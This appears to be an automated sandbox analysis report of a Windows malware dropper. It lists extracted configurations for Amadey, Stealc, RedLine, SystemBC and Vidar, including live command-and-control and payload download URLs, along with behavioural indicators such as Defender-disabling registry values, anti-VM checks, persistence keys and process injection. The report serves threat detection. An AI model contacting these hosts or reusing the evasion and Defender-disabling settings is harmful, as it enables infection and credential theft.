Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 02:47
Static task
static1
Behavioral task
behavioral1
Sample
52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe
Resource
win10v2004-20250217-en
General
-
Target
52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe
-
Size
5.6MB
-
MD5
97eadd1425c4ed73f262942879ede6bf
-
SHA1
0491c1917a0f0b90747696793b4e3a608b6202c0
-
SHA256
52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de
-
SHA512
21121dcd2ad9283d85e94cc9ce4771845720f5a4496c22fbce773540e7bf7ee2bc5f94690f34f7582b310306c3422ae419452103403db9eb29dc83fa1fbba1bc
-
SSDEEP
98304:LpdbhIOQV4Uxxfdc/MfrjGzt1Zbztcc/QB9ipVYqG78mhjvKq:bbSHVNdjmzi/eTGImFz
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/6756-3997-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/232-161-0x0000000000B20000-0x0000000000F94000-memory.dmp healer behavioral1/memory/232-162-0x0000000000B20000-0x0000000000F94000-memory.dmp healer behavioral1/memory/232-226-0x0000000000B20000-0x0000000000F94000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/3848-359-0x00000000006F0000-0x0000000000B68000-memory.dmp family_sectoprat behavioral1/memory/3848-360-0x00000000006F0000-0x0000000000B68000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 26 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vxjrl.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2d75d5050b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ff5f338aa7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3fd12b8336.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ db3a906615.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fe4803757b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vxjrl.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a6b1a4cd10.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 98d83610e7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5fc62877eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sgimsa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1I13Q5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2e3683.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3S70g.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f72e4fc3d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE -
Blocklisted process makes network request 12 IoCs
flow pid Process 23 2316 powershell.exe 39 3480 powershell.exe 93 992 powershell.exe 342 2356 powershell.exe 346 2356 powershell.exe 352 2356 powershell.exe 353 2356 powershell.exe 375 2356 powershell.exe 381 2356 powershell.exe 384 2356 powershell.exe 390 2356 powershell.exe 392 2356 powershell.exe -
pid Process 2428 powershell.exe 5860 powershell.exe 4992 powershell.exe 2728 powershell.exe 2316 powershell.exe 3480 powershell.exe 992 powershell.exe 2812 powershell.exe -
Downloads MZ/PE file 28 IoCs
flow pid Process 206 5084 BitLockerToGo.exe 225 5268 futors.exe 225 5268 futors.exe 225 5268 futors.exe 23 2316 powershell.exe 93 992 powershell.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 17 3932 skotes.exe 21 3932 skotes.exe 21 3932 skotes.exe 21 3932 skotes.exe 21 3932 skotes.exe 21 3932 skotes.exe 62 4444 BitLockerToGo.exe 39 3480 powershell.exe 330 5268 futors.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5556 chrome.exe 6764 msedge.exe 1000 msedge.exe 6848 chrome.exe 3356 chrome.exe 2828 chrome.exe 6196 msedge.exe 1632 msedge.exe 6988 msedge.exe 1032 msedge.exe -
Checks BIOS information in registry 2 TTPs 52 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vxjrl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ff5f338aa7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vxjrl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2e3683.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vxjrl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ff5f338aa7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vxjrl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3S70g.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fe4803757b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2e3683.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion db3a906615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f72e4fc3d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2d75d5050b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2d75d5050b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3fd12b8336.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6b1a4cd10.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6b1a4cd10.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 98d83610e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5fc62877eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1I13Q5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fe4803757b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f72e4fc3d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5fc62877eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sgimsa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3S70g.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3fd12b8336.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 98d83610e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion db3a906615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1I13Q5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sgimsa.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation 1I13Q5.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation futors.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 55 IoCs
pid Process 2248 r0S29.exe 4404 1I13Q5.exe 3932 skotes.exe 4280 skotes.exe 5040 2e3683.exe 4736 3S70g.exe 3812 oVpNTUm.exe 5108 c3aff24677.exe 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 220 c87d00f7d7.exe 3844 vxjrl.exe 3536 483d2fa8a0d53818306efeb32d3.exe 3376 72b1e5cdf3.exe 2312 ff5f338aa7.exe 2592 3fd12b8336.exe 4300 a6b1a4cd10.exe 4612 3omTNLZ.exe 3848 98d83610e7.exe 652 skotes.exe 4932 db3a906615.exe 232 fe4803757b.exe 3444 3f72e4fc3d.exe 1016 c3e6079de5.exe 1776 e46b6a6a31.exe 6960 amnew.exe 5268 futors.exe 5520 TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE 6652 2d75d5050b.exe 6740 5fc62877eb.exe 6548 3omTNLZ.exe 2304 vxjrl.exe 5336 skotes.exe 5420 futors.exe 6920 7aencsM.exe 6824 7aencsM.exe 6756 7aencsM.exe 2520 trano1221.exe 5712 trano1221.exe 736 DTQCxXZ.exe 2196 con12312211221.exe 4820 con12312211221.exe 6400 monthdragon.exe 6432 monthdragon.exe 6420 monthdragon.exe 6344 monthdragon.exe 6648 oVpNTUm.exe 3856 12321321.exe 2400 alex12112.exe 1880 alex12112.exe 7160 sgimsa.exe 5988 qFqSpAp.exe 3444 279d785fdc.exe 5316 Bjkm5hE.exe 2416 Bjkm5hE.exe 2196 Bjkm5hE.exe -
Identifies Wine through registry keys 2 TTPs 26 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 2d75d5050b.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 5fc62877eb.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine vxjrl.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 1I13Q5.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 2e3683.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3S70g.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine vxjrl.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine ff5f338aa7.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine a6b1a4cd10.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3fd12b8336.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 98d83610e7.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine db3a906615.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine fe4803757b.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 3f72e4fc3d.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine sgimsa.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine oVpNTUm.exe -
Loads dropped DLL 31 IoCs
pid Process 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe 5712 trano1221.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\279d785fdc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10007940101\\279d785fdc.exe" futors.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c3aff24677.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086592101\\c3aff24677.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086593021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fe4803757b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086625001\\fe4803757b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e46b6a6a31.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086628001\\e46b6a6a31.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" r0S29.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3f72e4fc3d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086626001\\3f72e4fc3d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c3e6079de5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086627001\\c3e6079de5.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000c000000023d49-69.dat autoit_exe behavioral1/files/0x000d000000023da8-809.dat autoit_exe behavioral1/files/0x000e000000023dab-831.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
pid Process 4404 1I13Q5.exe 3932 skotes.exe 4280 skotes.exe 5040 2e3683.exe 4736 3S70g.exe 3812 oVpNTUm.exe 232 TempU0WO1T3JGTO7ZTR5XXRNBLOKHVNLGGP1.EXE 3844 vxjrl.exe 3536 483d2fa8a0d53818306efeb32d3.exe 2312 ff5f338aa7.exe 2592 3fd12b8336.exe 4300 a6b1a4cd10.exe 4612 3omTNLZ.exe 3848 98d83610e7.exe 652 skotes.exe 4932 db3a906615.exe 232 fe4803757b.exe 3444 3f72e4fc3d.exe 5520 TempNNZCTBMACAVASD9W9CX6NSMWIY1YNVNB.EXE 6652 2d75d5050b.exe 6740 5fc62877eb.exe 6548 3omTNLZ.exe 2304 vxjrl.exe 5336 skotes.exe 6648 oVpNTUm.exe 7160 sgimsa.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2312 set thread context of 4444 2312 ff5f338aa7.exe 126 PID 2592 set thread context of 5084 2592 3fd12b8336.exe 129 PID 3376 set thread context of 3300 3376 72b1e5cdf3.exe 133 PID 6920 set thread context of 6756 6920 7aencsM.exe 180 PID 2196 set thread context of 4820 2196 con12312211221.exe 189 PID 6400 set thread context of 6344 6400 monthdragon.exe 209 PID 2400 set thread context of 1880 2400 alex12112.exe 240 PID 5316 set thread context of 2196 5316 Bjkm5hE.exe 254 -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\vxjrl.job oVpNTUm.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\sgimsa.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\sgimsa.job oVpNTUm.exe File created C:\Windows\Tasks\skotes.job 1I13Q5.exe File created C:\Windows\Tasks\vxjrl.job oVpNTUm.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023dda-3952.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 5056 4932 WerFault.exe 132 2708 6920 WerFault.exe 178 6532 2196 WerFault.exe 186 6292 6400 WerFault.exe 205 1184 2400 WerFault.exe 239 5280 5316 WerFault.exe 251 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 52946b66de6fc415252ea9cd515d6e599e86239933653dc11e607fe94cbea2de.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f72e4fc3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sgimsa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c3aff24677.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened 